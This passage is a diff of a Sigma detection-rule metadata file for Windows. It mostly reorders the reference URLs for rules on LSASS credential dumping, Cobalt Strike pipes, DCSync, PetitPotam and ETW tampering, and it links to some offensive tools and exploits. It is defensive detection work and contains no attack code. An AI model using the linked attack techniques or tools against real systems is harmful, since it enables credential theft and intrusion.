"https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml" ], "tags": [ @@ -3301,11 +3301,11 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml" ], "tags": [ @@ -3396,8 +3396,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://github.com/D1rkMtr/UnhookingPatch", "https://twitter.com/D1rkMtr/status/1611471891193298944?s=20", + "https://github.com/D1rkMtr/UnhookingPatch", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_invoke_patchingapi.yml" ], "tags": [ @@ -3513,8 +3513,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://twitter.com/_xpn_/status/1491557187168178176", "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", + "https://twitter.com/_xpn_/status/1491557187168178176", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_indicators.yml" ], "tags": [ @@ -3619,8 +3619,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html", "https://twitter.com/SBousseaden/status/1541920424635912196", + "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html", "https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_seclogon.yml" ], @@ -3700,8 +3700,8 @@ "logsource.category": "process_tampering", "logsource.product": "windows", "refs": [ - "https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/", "https://twitter.com/SecurePeacock/status/1486054048390332423?s=20", + "https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_process_hollowing.yml" ], "tags": [ @@ -3912,11 +3912,11 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/", + "https://twitter.com/d4rksystem/status/1357010969264873472", "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", "https://github.com/SigmaHQ/sigma/issues/253", "https://redcanary.com/threat-detection-report/threats/cobalt-strike/", - "https://twitter.com/d4rksystem/status/1357010969264873472", + "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml" ], "tags": [ @@ -4227,18 +4227,18 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", - "https://www.us-cert.gov/ncas/alerts/TA17-117A", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a", - "https://securelist.com/faq-the-projectsauron-apt/75533/", - "https://github.com/RiccardoAncarani/LiquidSnake", "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", - "https://thedfirreport.com/2020/06/21/snatch-ransomware/", + "https://securelist.com/faq-the-projectsauron-apt/75533/", + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://www.us-cert.gov/ncas/alerts/TA17-117A", + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://thedfirreport.com/2020/06/21/snatch-ransomware/", "https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml" ], "tags": [ @@ -4298,9 +4298,9 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml", - "https://github.com/Azure/SimuLand", "https://o365blog.com/post/adfs/", + "https://github.com/Azure/SimuLand", + "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_adfs_namedpipe_connection.yml" ], "tags": [ @@ -4710,8 +4710,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", "https://twitter.com/deviouspolack/status/832535435960209408", + "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_eventlog_cleared.yml" ], "tags": [ @@ -4745,9 +4745,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", - "https://twitter.com/MsftSecIntel/status/1257324139515269121", "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", + "https://twitter.com/MsftSecIntel/status/1257324139515269121", + "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_iso_mount.yml" ], "tags": [ @@ -4840,8 +4840,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml" ], "tags": [ @@ -4922,8 +4922,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_logon.yml" ], "tags": "No established tags" @@ -5009,8 +5009,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml", "https://o365blog.com/post/hybridhealthagent/", + "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml" ], "tags": [ @@ -5228,10 +5228,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/sensepost/ruler/issues/47", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624", - "https://github.com/sensepost/ruler", "https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427", + "https://github.com/sensepost/ruler", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624", + "https://github.com/sensepost/ruler/issues/47", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ruler.yml" ], @@ -5309,8 +5309,8 @@ "logsource.product": "windows", "refs": [ "https://awakesecurity.com/blog/threat-hunting-for-paexec/", - "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html", "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf", + "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_service_installs.yml" ], "tags": [ @@ -5463,9 +5463,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634", - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_logoff.yml" ], "tags": "No established tags" @@ -5533,9 +5533,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events", "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/", "https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis", - "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_pass_the_hash_2.yml" ], "tags": [ @@ -5559,9 +5559,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete", "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm", "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_sdelete.yml" ], "tags": [ @@ -5692,8 +5692,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", "https://twitter.com/SBousseaden/status/1207671369963646976", + "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_wocao.yml" ], "tags": [ @@ -5747,8 +5747,8 @@ "logsource.product": "windows", "refs": [ "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", - "https://twitter.com/_dirkjan/status/1309214379003588608", "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", + "https://twitter.com/_dirkjan/status/1309214379003588608", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml" ], "tags": [ @@ -5964,13 +5964,13 @@ "logsource.product": "windows", "refs": [ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728", "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_group_modification_logging.yml" ], @@ -6041,8 +6041,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g", "https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml", + "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_krbrelayup.yml" ], "tags": [ @@ -6099,9 +6099,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", "https://github.com/fox-it/LDAPFragger", - "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml" ], "tags": [ @@ -6270,9 +6270,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d", "https://twitter.com/gentilkiwi/status/1003236624925413376", "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", - "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_possible_dc_shadow.yml" ], "tags": [ @@ -6410,8 +6410,8 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616", - "Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)", "Live environment caused by malware", + "Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_time_modification.yml" ], "tags": [ @@ -6775,8 +6775,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html", "https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation", + "https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_access_token_abuse.yml" ], "tags": [ @@ -6833,8 +6833,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/menasec1/status/1111556090137903104", "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", + "https://twitter.com/menasec1/status/1111556090137903104", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_backdoor_dcsync_rights.yml" ], "tags": [ @@ -7084,8 +7084,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649", "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_replay_attack_detected.yml" ], "tags": "No established tags" @@ -7107,9 +7107,9 @@ "logsource.product": "windows", "refs": [ "https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html", - "https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8", - "https://twitter.com/Flangvik/status/1283054508084473861", "https://twitter.com/SecurityJosh/status/1283027365770276866", + "https://twitter.com/Flangvik/status/1283054508084473861", + "https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml" ], "tags": [ @@ -7388,9 +7388,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml", "https://github.com/topotam/PetitPotam", "https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/", - "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml" ], "tags": [ @@ -7423,8 +7423,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673", + "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_driver_loaded.yml" ], "tags": [ @@ -8160,10 +8160,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800", - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.cisecurity.org/controls/cis-controls-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_workstation_was_locked.yml" ], "tags": "No established tags" @@ -8213,16 +8213,16 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", - "https://bunnyinside.com/?term=f71e8cb9c76a", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "http://managed670.rssing.com/chan-5590147/all_p1.html", - "https://twitter.com/_xpn_/status/1268712093928378368", - "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://twitter.com/_xpn_/status/1268712093928378368", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://bunnyinside.com/?term=f71e8cb9c76a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dot_net_etw_tamper.yml" ], "tags": [ @@ -8350,8 +8350,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx", "https://twitter.com/SBousseaden/status/1096148422984384514", + "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_reverse_tunnel.yml" ], "tags": [ @@ -8396,8 +8396,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml", "https://o365blog.com/post/hybridhealthagent/", + "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml" ], "tags": [ @@ -8454,8 +8454,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", + "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_teams_suspicious_objectaccess.yml" ], "tags": [ @@ -8719,8 +8719,8 @@ "logsource.product": "windows", "refs": [ "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html", - "https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all", "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", + "https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_user_enumeration.yml" ], "tags": [ @@ -8967,10 +8967,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/gentilkiwi/status/1003236624925413376", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662", - "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r", + "https://twitter.com/gentilkiwi/status/1003236624925413376", + "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcsync.yml" ], "tags": [ @@ -9089,8 +9089,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", "https://twitter.com/SBousseaden/status/1490608838701166596", + "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_service_installation_by_unusal_client.yml" ], "tags": [ @@ -9156,8 +9156,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py", "https://twitter.com/malmoeb/status/1511760068743766026", + "https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py", "https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_computer_name.yml" ], @@ -9349,8 +9349,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/JohnLaTwC/status/1004895028995477505", "https://goo.gl/PsqrhT", + "https://twitter.com/JohnLaTwC/status/1004895028995477505", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml" ], "tags": [ @@ -9630,8 +9630,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed", "https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31", + "https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed", "https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_av_relevant_match.yml" ], @@ -9665,8 +9665,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16", "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_sp_procoption_set.yml" ], "tags": [ @@ -9745,8 +9745,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://technet.microsoft.com/en-us/library/security/4022344", "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5", + "https://technet.microsoft.com/en-us/library/security/4022344", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_susp_msmpeng_crash.yml" ], "tags": [ @@ -9805,9 +9805,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55", - "https://github.com/deepinstinct/Lsass-Shtinkering", "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", + "https://github.com/deepinstinct/Lsass-Shtinkering", + 